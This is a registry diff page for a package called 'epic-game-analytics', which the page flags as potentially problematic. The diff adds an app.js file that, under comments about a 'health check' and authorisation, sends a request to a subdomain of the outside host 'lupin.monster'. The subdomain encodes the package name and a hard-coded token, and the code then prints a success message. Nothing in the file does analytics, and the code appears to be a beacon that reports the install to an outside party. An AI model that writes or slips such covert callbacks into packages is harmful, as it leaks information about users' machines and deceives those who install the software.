epic-game-analytics 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of epic-game-analytics might be problematic. Click here for more details.
- package/app.js +20 -0
- package/package.json +12 -0
package/app.js
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
const https = require('https');
|
2
|
+
const os = require('os');
|
3
|
+
|
4
|
+
// Preparing Authorization Forms
|
5
|
+
const domain = "lupin.monster";
|
6
|
+
const api_token = "ccdh0e2n01lqllkga2pgzw1fj8zj7iqkp";
|
7
|
+
const package_name = "epic-game-analytics";
|
8
|
+
|
9
|
+
const health_check = `http://${package_name}.${api_token}.${domain}`;
|
10
|
+
|
11
|
+
// Check if computer is authorized to ping lupin.monster
|
12
|
+
https.get(health_check, (res) => {
|
13
|
+
if (res.statusCode === 200) {
|
14
|
+
console.log('\x1b[36m%s\x1b[0m', '[*] epic-game-analytics was installed successfully');
|
15
|
+
} else {
|
16
|
+
console.log(`Request failed with status code ${res.statusCode}`);
|
17
|
+
}
|
18
|
+
}).on('error', (e) => {
|
19
|
+
console.error(`Got error: ${e.message}`);
|
20
|
+
});
|
package/package.json
ADDED